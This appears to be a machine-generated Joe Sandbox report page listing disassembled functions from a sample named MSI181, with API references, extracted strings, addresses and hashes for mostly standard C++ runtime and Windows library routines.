Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: 83c865395e90f135df373018df06f1cd21ed1bdfa3af5fbc46c1f98aeb365957
Instruction ID: 9d54ba2dcedebe0a5292af06b20e79281cf8ae6bccc3e891a29c6b61e04c1cce
Opcode Fuzzy Hash: 83c865395e90f135df373018df06f1cd21ed1bdfa3af5fbc46c1f98aeb365957
Instruction Fuzzy Hash: CC018B3590011AAFCF11ABA4980AABE7FB5BF94710F24080AF8116B292CF309E05DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00592F33 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592F3A
std::_Lockit::_Lockit.LIBCPMT ref: 00592F44

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 00592F95
std::_Lockit::~_Lockit.LIBCPMT ref: 00592FB5

Strings

2Z, xrefs: 00592FA2

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: e003b777af2ea12b3e0d5a16233c622113b8b19cf0065dd632f54f0d1d84b3ee
Instruction ID: abefa232e88d4a04ac1e64ddd43077bccda117446263cbdeb5d563465ae88e17
Opcode Fuzzy Hash: e003b777af2ea12b3e0d5a16233c622113b8b19cf0065dd632f54f0d1d84b3ee
Instruction Fuzzy Hash: 1D01C435900116DFCF10EBA4981AABDBFB5BFD4710F14090AF805AB2D1DF349E019B91

Uniqueness

Uniqueness Score: -1.00%

Function 005A2D20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,005A2CBD,00000064), ref: 005A2D43
LeaveCriticalSection.KERNEL32(005DDD3C,?,?,005A2CBD,00000064,?,?,?,005823B6,005DE638,F302A5AA,?,?,005C3D6D,000000FF), ref: 005A2D4D
WaitForSingleObjectEx.KERNEL32(?,00000000,?,005A2CBD,00000064,?,?,?,005823B6,005DE638,F302A5AA,?,?,005C3D6D,000000FF), ref: 005A2D5E
EnterCriticalSection.KERNEL32(005DDD3C,?,005A2CBD,00000064,?,?,?,005823B6,005DE638,F302A5AA,?,?,005C3D6D,000000FF), ref: 005A2D65

Strings

2Z, xrefs: 005A2D3D

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID: 2Z
API String ID: 3269011525-2484645983
Opcode ID: acb228bd73845bfcdd788fb18931abc84cecae38e476a2640882807f29665264
Instruction ID: 2d3ed8d73334312b8374156712869c166271b2ac1f0c3bbc989019a904dd8ca2
Opcode Fuzzy Hash: acb228bd73845bfcdd788fb18931abc84cecae38e476a2640882807f29665264
Instruction Fuzzy Hash: D0E09232505928BFCF223B48EC09E8E3F3ABF19B60F000013F90566231C7600905AFE1

Uniqueness

Uniqueness Score: -1.00%

Function 005B6DB9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 005B6E40
__alloca_probe_16.LIBCMT ref: 005B6F01
__freea.LIBCMT ref: 005B6F68

Part of subcall function 005B5BDC: HeapAlloc.KERNEL32(00000000,00000000,A8[,?,005B543A,?,00000000,?,005A6CE7,00000000,A8[,00000000,?,?,?,005B363B), ref: 005B5C0E

__freea.LIBCMT ref: 005B6F7D
__freea.LIBCMT ref: 005B6F8D

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 505ace1ed8c292b3bd5ecbd12a770f84fb5cf66acdcf096f2dcb53640962c1ef
Instruction ID: 9d5ce8c20bc1f0b73057c0dc2bb7e5eac4afd76eea795c24f06b20e1f9ac2862
Opcode Fuzzy Hash: 505ace1ed8c292b3bd5ecbd12a770f84fb5cf66acdcf096f2dcb53640962c1ef
Instruction Fuzzy Hash: 7F518C72600207AFEB219EA4DC85EFF7EA9FF48750B150529FD08D6150E739EC508B60

Uniqueness

Uniqueness Score: -1.00%

Function 0058B8B0 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0058B8DD
std::_Lockit::_Lockit.LIBCPMT ref: 0058B900
std::_Lockit::~_Lockit.LIBCPMT ref: 0058B928
std::_Facet_Register.LIBCPMT ref: 0058B98D
std::_Lockit::~_Lockit.LIBCPMT ref: 0058B9B7

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 47c9def051f56200753aa6ebd9ea2864ebe838ac9e4c774cab2304eae59e7f2a
Instruction ID: 395925aa7644d7362395fccf837380552cd281bd8c5da8d819be6eb463943f66
Opcode Fuzzy Hash: 47c9def051f56200753aa6ebd9ea2864ebe838ac9e4c774cab2304eae59e7f2a
Instruction Fuzzy Hash: 9131DF31901215DFDB20EF58D945BAEBFB8FB20720F14459AE905BB2E1D730AE05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00591C42 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 00591C62
_Maklocstr.LIBCPMT ref: 00591C7F
_Maklocstr.LIBCPMT ref: 00591C9C
_Maklocchr.LIBCPMT ref: 00591CAE
_Maklocchr.LIBCPMT ref: 00591CC1

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: dbd87db2968bed970d09e4998041e0f4bb8e71789520999d10b40314eda314e0
Instruction ID: f3fc254174bd3b519f6c4e329f6fb49d561e6f948620d5d85bd08f87a8d1fffe
Opcode Fuzzy Hash: dbd87db2968bed970d09e4998041e0f4bb8e71789520999d10b40314eda314e0
Instruction Fuzzy Hash: FE118FB1A44B96BFEB20DBA48885F12BFECBF44350F08051AF5458B641D275FD5087A9

Uniqueness

Uniqueness Score: -1.00%

Function 0058EC87 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 317COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0058EC8E

Part of subcall function 0058D87C: __EH_prolog3.LIBCMT ref: 0058D883
Part of subcall function 0058D87C: std::_Lockit::_Lockit.LIBCPMT ref: 0058D88D
Part of subcall function 0058D87C: std::_Lockit::~_Lockit.LIBCPMT ref: 0058D8FE

_Find_elem.LIBCPMT ref: 0058EE8A

Strings

2Z, xrefs: 0058ECBC, 0058ED00
0123456789ABCDEFabcdef-+Xx, xrefs: 0058ECF6

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 2Z$0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2062474290
Opcode ID: 7577a1eed8f849032b07886a0e02728373276832768a5df83dc40cf46c0f88ec
Instruction ID: 7029f1079b7e1d7c8e785863c4c533a7414b1e5f08add8695def47710050e4ed
Opcode Fuzzy Hash: 7577a1eed8f849032b07886a0e02728373276832768a5df83dc40cf46c0f88ec
Instruction Fuzzy Hash: 8EC18C34E052999FEF25EBA48546BACBFB6BF55300F284469EC857B283C7309D46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 005962BE Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 316COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005962C8

Part of subcall function 00592D74: __EH_prolog3.LIBCMT ref: 00592D7B
Part of subcall function 00592D74: std::_Lockit::_Lockit.LIBCPMT ref: 00592D85
Part of subcall function 00592D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00592DF6

_Find_elem.LIBCPMT ref: 00596502

Strings

2Z, xrefs: 005962FC, 00596349
0123456789ABCDEFabcdef-+Xx, xrefs: 0059633F

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 2Z$0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2062474290
Opcode ID: 162feaed46d1b18a2a1f1fb0e513aec5fd0e4318a8df99b11b16335345634f98
Instruction ID: 7148bdc69facfefc90fd47e7ba6a906d3f731dfec80bc03efc32f4a75d652bbc
Opcode Fuzzy Hash: 162feaed46d1b18a2a1f1fb0e513aec5fd0e4318a8df99b11b16335345634f98
Instruction Fuzzy Hash: 0DC1A470E042698FDF25DFA8C8857BCBFB1BF51304F544499D889AB286DB349C89DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00596694 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 316COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0059669E

Part of subcall function 0058B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 0058B8DD
Part of subcall function 0058B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 0058B900
Part of subcall function 0058B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 0058B928
Part of subcall function 0058B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 0058B9B7

_Find_elem.LIBCPMT ref: 005968D8

Strings

2Z, xrefs: 005966D2, 0059671F
0123456789ABCDEFabcdef-+Xx, xrefs: 00596715

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 2Z$0123456789ABCDEFabcdef-+Xx
API String ID: 3042121994-2062474290
Opcode ID: db7355ae21598f708a0a48439b57383ba5ceb178b320ba315a67b08b1d803c9c
Instruction ID: 5a3b8b222bd1bf51ede9df542362d81e278e2126a89e4d09de02889247876cad
Opcode Fuzzy Hash: db7355ae21598f708a0a48439b57383ba5ceb178b320ba315a67b08b1d803c9c
Instruction Fuzzy Hash: 71C1A130E042598FDF25DFA8C8957BCBFB2BF51304F548499D889AB282DB349D89DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0058BB40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000018,F302A5AA,?,00000000), ref: 0058BBA3
Concurrency::cancel_current_task.LIBCPMT ref: 0058BD7F

Strings

true, xrefs: 0058BCAB
false, xrefs: 0058BC95

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: AllocConcurrency::cancel_current_taskLocal
String ID: false$true
API String ID: 3924972193-2658103896
Opcode ID: b6364ac91f74a715802904cd93fd228d40c950272b7a43dc82346dd0a75414b0
Instruction ID: 009a9fad169cd51674d7e69c82b63473173ef3f739bebbaa96419532d52934b1
Opcode Fuzzy Hash: b6364ac91f74a715802904cd93fd228d40c950272b7a43dc82346dd0a75414b0
Instruction Fuzzy Hash: 9F61AFB1D00749DFDB10DFA4C945BAEBBF8FF04704F14426AE845AB281E775AA48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0059D4FA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0059D501
_swprintf.LIBCMT ref: 0059D573

Part of subcall function 0059254E: __EH_prolog3.LIBCMT ref: 00592555
Part of subcall function 0059254E: std::_Lockit::_Lockit.LIBCPMT ref: 0059255F
Part of subcall function 0059254E: std::_Lockit::~_Lockit.LIBCPMT ref: 005925D0

Part of subcall function 00592FC8: __EH_prolog3.LIBCMT ref: 00592FCF

Strings

2Z, xrefs: 0059D5C9, 0059D611
%.0Lf, xrefs: 0059D56B

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
String ID: 2Z$%.0Lf
API String ID: 3050236999-988635748
Opcode ID: 83f1006c5acd79e0de3aa30023ab7580eec7658618766910703531e5a916d8d6
Instruction ID: 81078c4255e29f797215ebf609f7349136585ec2f6ab0c707bf34f923385f827
Opcode Fuzzy Hash: 83f1006c5acd79e0de3aa30023ab7580eec7658618766910703531e5a916d8d6
Instruction Fuzzy Hash: DF416C71D00209ABCF05EFE4D849AEDBFB5FF48314F208449E846AB295EB359915CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0059D79E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0059D7A5
_swprintf.LIBCMT ref: 0059D817

Part of subcall function 00588610: std::_Lockit::_Lockit.LIBCPMT ref: 00588657
Part of subcall function 00588610: std::_Lockit::_Lockit.LIBCPMT ref: 00588679
Part of subcall function 00588610: std::_Lockit::~_Lockit.LIBCPMT ref: 005886A1
Part of subcall function 00588610: std::_Lockit::~_Lockit.LIBCPMT ref: 0058880E

Strings

2Z, xrefs: 0059D86D, 0059D8B5
%.0Lf, xrefs: 0059D80F

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
String ID: 2Z$%.0Lf
API String ID: 1487807907-988635748
Opcode ID: f14cf9a4d2b36d1db58b84dd71e567deb3465864c80002168aa5c22763395c4c
Instruction ID: 70eef6834f28b8b110980c7524953650ac6ad0c72957857b5fd40ad7d21290b1
Opcode Fuzzy Hash: f14cf9a4d2b36d1db58b84dd71e567deb3465864c80002168aa5c22763395c4c
Instruction Fuzzy Hash: B8418A75D00219ABCF05EFE4D849AEDBFB5FF48310F204449E846AB295EB35A915CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 005A1887 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005A188E
_swprintf.LIBCMT ref: 005A1900

Part of subcall function 00589270: std::_Lockit::_Lockit.LIBCPMT ref: 005892A0
Part of subcall function 00589270: std::_Lockit::_Lockit.LIBCPMT ref: 005892C2
Part of subcall function 00589270: std::_Lockit::~_Lockit.LIBCPMT ref: 005892EA
Part of subcall function 00589270: std::_Lockit::~_Lockit.LIBCPMT ref: 00589422

Strings

2Z, xrefs: 005A1956, 005A199B
%.0Lf, xrefs: 005A18F8

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
String ID: 2Z$%.0Lf
API String ID: 1487807907-988635748
Opcode ID: 72a49ff410de0bd579fcd716f237e89faf7c796ce577306471231fa521506ea2
Instruction ID: 0e5f1df454d97ad28fd02ac1b5eddfc3bd97e52b665c0af1112f9d2574c0dea2
Opcode Fuzzy Hash: 72a49ff410de0bd579fcd716f237e89faf7c796ce577306471231fa521506ea2
Instruction Fuzzy Hash: EF416A75E00209ABCF05EFE0D849ADDBFB5FF49300F204449E846AB2A1DB359915DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00598386 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059838D

Part of subcall function 00591C42: _Maklocstr.LIBCPMT ref: 00591C62
Part of subcall function 00591C42: _Maklocstr.LIBCPMT ref: 00591C7F
Part of subcall function 00591C42: _Maklocstr.LIBCPMT ref: 00591C9C
Part of subcall function 00591C42: _Maklocchr.LIBCPMT ref: 00591CAE
Part of subcall function 00591C42: _Maklocchr.LIBCPMT ref: 00591CC1

_Mpunct.LIBCPMT ref: 0059841A
_Mpunct.LIBCPMT ref: 00598434

Strings

$+xv, xrefs: 0059843F

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Maklocstr$MaklocchrMpunct$H_prolog3
String ID: $+xv
API String ID: 2939335142-1686923651
Opcode ID: 4c23337bb0c8bc08fd14bf440946ef238d76c47c51e4d883ef557244fa07755c
Instruction ID: 02f5d3c83b661e118cebd02fd7c51e3209af791ebc247e9489db15c9659a1c7f
Opcode Fuzzy Hash: 4c23337bb0c8bc08fd14bf440946ef238d76c47c51e4d883ef557244fa07755c
Instruction Fuzzy Hash: 122181B1904A926EDF25DF75889477BBEE8BF49300B04095AE459C7A42D734E601CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0059FFEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059FFF1
_Mpunct.LIBCPMT ref: 005A007E
_Mpunct.LIBCPMT ref: 005A0098

Strings

$+xv, xrefs: 005A00A3

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Mpunct$H_prolog3
String ID: $+xv
API String ID: 4281374311-1686923651
Opcode ID: 677ac0349fb8de74acf5f30f7488a42c7aa5c95ba3b1cba07bcbc75edd75da9e
Instruction ID: 0f2f8b17a094c09bdc14dd8a85a34729ceefd15cd3e717e38e002e38814cfec2
Opcode Fuzzy Hash: 677ac0349fb8de74acf5f30f7488a42c7aa5c95ba3b1cba07bcbc75edd75da9e
Instruction Fuzzy Hash: EE21B2B1804B92AEDB21DF75849877FBEF8BB4D300F04491AE099C7A42D374E601CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005824C0 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00581434,?,00000000), ref: 00582569
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00581434,?,00000000), ref: 00582589
LocalFree.KERNEL32(?,00581434,?,00000000), ref: 005825DF
CloseHandle.KERNEL32(00000000,F302A5AA,?,00000000,005C3C40,000000FF,00000008,?,?,?,?,00581434,?,00000000), ref: 00582633
LocalFree.KERNEL32(?,F302A5AA,?,00000000,005C3C40,000000FF,00000008,?,?,?,?,00581434), ref: 00582647

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Local$AllocFree$CloseHandle
String ID:
API String ID: 1291444452-0
Opcode ID: d2d3e84bd431951e8d4f91d30f1a96cfbf331504fed6ab19fae08be16f3561ac
Instruction ID: 6aed1f9cd574e0f109c55283d694501635390caf988b22c00f3478d0936dc8d1
Opcode Fuzzy Hash: d2d3e84bd431951e8d4f91d30f1a96cfbf331504fed6ab19fae08be16f3561ac
Instruction Fuzzy Hash: 39412B726442159FC314AF68D858A6ABFD8FB49360F10462AFD26EB6D0EB30D9448B90

Uniqueness

Uniqueness Score: -1.00%

Function 0058A910 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 377COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00589C9B), ref: 0058ACD1

Strings

@T], xrefs: 0058A941
@T], xrefs: 0058AB73, 0058AAFF
T], xrefs: 0058AC38, 0058ABB4, 0058ABF9, 0058AB0C

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: FreeLocal
String ID: @T]$@T]$T]
API String ID: 2826327444-2322267874
Opcode ID: 0f0152586a3c199e757dfa1e7fac92ab3289b659ac2ac963d51f34860a533894
Instruction ID: 96289126c4f372c390fd07a4621fd3220aa545ec8a05383b385f7dd23f4fcd4d
Opcode Fuzzy Hash: 0f0152586a3c199e757dfa1e7fac92ab3289b659ac2ac963d51f34860a533894
Instruction Fuzzy Hash: 25E16B71A00249DFEF14DFA8C884AEEBFB9FF48300F14416AE815BB251D775A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005C1D9B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(F302A5AA,?,00000000,?), ref: 005C1DFE

